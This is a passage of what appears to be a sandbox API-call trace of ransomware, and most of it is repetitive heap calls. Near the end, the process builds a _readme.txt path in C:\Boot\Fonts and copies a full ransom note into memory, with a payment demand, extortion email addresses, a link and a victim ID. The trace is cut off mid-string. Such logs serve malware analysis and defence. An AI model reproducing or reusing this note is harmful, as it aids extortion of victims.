hHeap=0x2c0000) returned 1 [0183.660] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ade6e0 | out: hHeap=0x2c0000) returned 1 [0183.661] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7950 | out: hHeap=0x2c0000) returned 1 [0183.661] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7950 [0183.661] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac4ee0 [0183.661] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0183.662] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7950 | out: hHeap=0x2c0000) returned 1 [0183.662] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7950 [0183.662] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac4ee0 [0183.662] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0183.663] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7950 | out: hHeap=0x2c0000) returned 1 [0183.663] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7950 [0183.663] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac4ee0 [0183.663] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0183.663] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7950 | out: hHeap=0x2c0000) returned 1 [0183.663] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7950 [0183.663] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac4ee0 [0183.664] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0183.664] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7950 | out: hHeap=0x2c0000) returned 1 [0183.664] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7950 [0183.664] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac4ee0 [0183.664] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0183.665] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7950 | out: hHeap=0x2c0000) returned 1 [0183.665] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7950 [0183.665] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac4ee0 [0183.665] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0183.665] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7950 | out: hHeap=0x2c0000) returned 1 [0183.665] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7950 [0183.665] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac4ee0 [0183.666] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0183.666] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7950 | out: hHeap=0x2c0000) returned 1 [0183.666] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7950 [0183.666] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac4ee0 [0183.666] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0183.667] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7950 | out: hHeap=0x2c0000) returned 1 [0183.667] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7950 [0183.667] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac4ee0 [0183.667] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0183.667] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7950 | out: hHeap=0x2c0000) returned 1 [0183.668] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7950 [0183.668] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac4ee0 [0183.668] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0183.668] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7950 | out: hHeap=0x2c0000) returned 1 [0183.669] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7950 [0183.669] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac4ee0 [0183.669] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0183.670] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7950 | out: hHeap=0x2c0000) returned 1 [0183.670] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7950 [0183.670] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac4ee0 [0183.671] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0183.671] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7950 | out: hHeap=0x2c0000) returned 1 [0183.671] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7950 [0183.671] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac4ee0 [0183.671] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0183.672] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7950 | out: hHeap=0x2c0000) returned 1 [0183.672] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7950 [0183.672] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac4ee0 [0183.672] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0183.672] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7950 | out: hHeap=0x2c0000) returned 1 [0183.672] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7950 [0183.672] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac4ee0 [0183.673] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0183.673] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7950 | out: hHeap=0x2c0000) returned 1 [0183.673] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7950 [0183.673] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac4ee0 [0183.673] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x2ade6e0 [0183.674] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0183.674] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ade6e0 | out: hHeap=0x2c0000) returned 1 [0183.674] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7950 | out: hHeap=0x2c0000) returned 1 [0183.674] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7950 [0183.674] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac4ee0 [0183.675] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0183.675] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7950 | out: hHeap=0x2c0000) returned 1 [0183.675] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7950 [0183.675] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac4ee0 [0183.675] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc2e) returned 0x2ade6e0 [0183.676] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0183.676] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ade6e0 | out: hHeap=0x2c0000) returned 1 [0183.676] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7950 | out: hHeap=0x2c0000) returned 1 [0183.676] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7950 [0183.676] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac4ee0 [0183.676] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0183.677] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7950 | out: hHeap=0x2c0000) returned 1 [0183.677] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7950 [0183.677] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac4ee0 [0183.677] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0183.677] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7950 | out: hHeap=0x2c0000) returned 1 [0183.677] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7950 [0183.677] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac4ee0 [0183.678] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0183.678] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7950 | out: hHeap=0x2c0000) returned 1 [0183.678] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7950 [0183.678] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac4ee0 [0183.678] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0183.678] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7950 | out: hHeap=0x2c0000) returned 1 [0183.678] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7950 [0183.679] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac4ee0 [0183.679] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x2ade6e0 [0183.679] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0183.679] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ade6e0 | out: hHeap=0x2c0000) returned 1 [0183.679] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7950 | out: hHeap=0x2c0000) returned 1 [0183.679] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7950 [0183.679] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac4ee0 [0183.680] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0183.680] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7950 | out: hHeap=0x2c0000) returned 1 [0183.680] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7950 [0183.680] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac4ee0 [0183.680] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0183.680] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7950 | out: hHeap=0x2c0000) returned 1 [0183.680] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7950 [0183.680] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac4ee0 [0183.681] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0183.681] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7950 | out: hHeap=0x2c0000) returned 1 [0183.681] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7950 [0183.681] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac4ee0 [0183.681] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0183.681] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7950 | out: hHeap=0x2c0000) returned 1 [0183.681] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7950 [0183.681] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac4ee0 [0183.682] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0183.682] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7950 | out: hHeap=0x2c0000) returned 1 [0183.682] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7950 [0183.682] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac4ee0 [0183.682] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0183.682] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7950 | out: hHeap=0x2c0000) returned 1 [0183.682] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7950 [0183.682] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac4ee0 [0183.683] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0183.683] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7950 | out: hHeap=0x2c0000) returned 1 [0183.683] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7950 [0183.683] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac4ee0 [0183.684] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0183.684] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7950 | out: hHeap=0x2c0000) returned 1 [0183.684] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7950 [0183.684] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac4ee0 [0183.684] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0183.685] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7950 | out: hHeap=0x2c0000) returned 1 [0183.685] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7950 [0183.685] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac4ee0 [0183.685] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x2ade6e0 [0183.685] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0183.685] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ade6e0 | out: hHeap=0x2c0000) returned 1 [0183.686] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7950 | out: hHeap=0x2c0000) returned 1 [0183.686] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7950 [0183.686] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac4ee0 [0183.686] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0183.686] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7950 | out: hHeap=0x2c0000) returned 1 [0183.686] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7950 [0183.686] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac4ee0 [0183.687] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0183.687] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7950 | out: hHeap=0x2c0000) returned 1 [0183.687] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7950 [0183.687] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac4ee0 [0183.687] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0183.688] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7950 | out: hHeap=0x2c0000) returned 1 [0183.688] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7950 [0183.688] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac4ee0 [0183.688] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0183.688] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7950 | out: hHeap=0x2c0000) returned 1 [0183.688] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7950 [0183.688] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac4ee0 [0183.689] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0183.689] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7950 | out: hHeap=0x2c0000) returned 1 [0183.689] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7950 [0183.689] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac4ee0 [0183.689] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x2ade6e0 [0183.689] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0183.689] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ade6e0 | out: hHeap=0x2c0000) returned 1 [0183.690] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7950 | out: hHeap=0x2c0000) returned 1 [0183.690] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7950 [0183.690] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac4ee0 [0183.690] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0183.691] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7950 | out: hHeap=0x2c0000) returned 1 [0183.691] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7950 [0183.691] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac4ee0 [0183.691] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0183.691] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7950 | out: hHeap=0x2c0000) returned 1 [0183.691] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7950 [0183.691] PathFindFileNameW (pszPath="C:\\Boot\\Fonts\\") returned="Fonts\\" [0183.692] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0183.692] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ea0 | out: hHeap=0x2c0000) returned 1 [0183.692] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0183.692] PathFindFileNameW (pszPath="") returned="" [0183.692] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x759a0000 [0183.692] GetProcAddress (hModule=0x759a0000, lpProcName="SHGetFolderPathW") returned 0x75a25708 [0183.692] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x2ade6e0 | out: pszPath="C:\\Users\\kEecfMwgj") returned 0x0 [0183.693] FreeLibrary (hLibModule=0x759a0000) returned 1 [0183.693] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7950 | out: hHeap=0x2c0000) returned 1 [0183.693] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ade6e0 | out: hHeap=0x2c0000) returned 1 [0183.693] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7e78 | out: hHeap=0x2c0000) returned 1 [0183.693] PathAppendW (in: pszPath="C:\\Boot\\Fonts\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\Fonts\\_readme.txt") returned 1 [0183.693] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0183.693] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7e78 | out: hHeap=0x2c0000) returned 1 [0183.693] PathFileExistsW (pszPath="C:\\Boot\\Fonts\\_readme.txt") returned 0 [0183.693] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x7d00) returned 0x2ae3ea0 [0183.694] lstrcpyW (in: lpString1=0x2ae3ea0, lpString2="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd" [0183.694] lstrcatW (in: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd", lpString2="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531JhyjduyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not 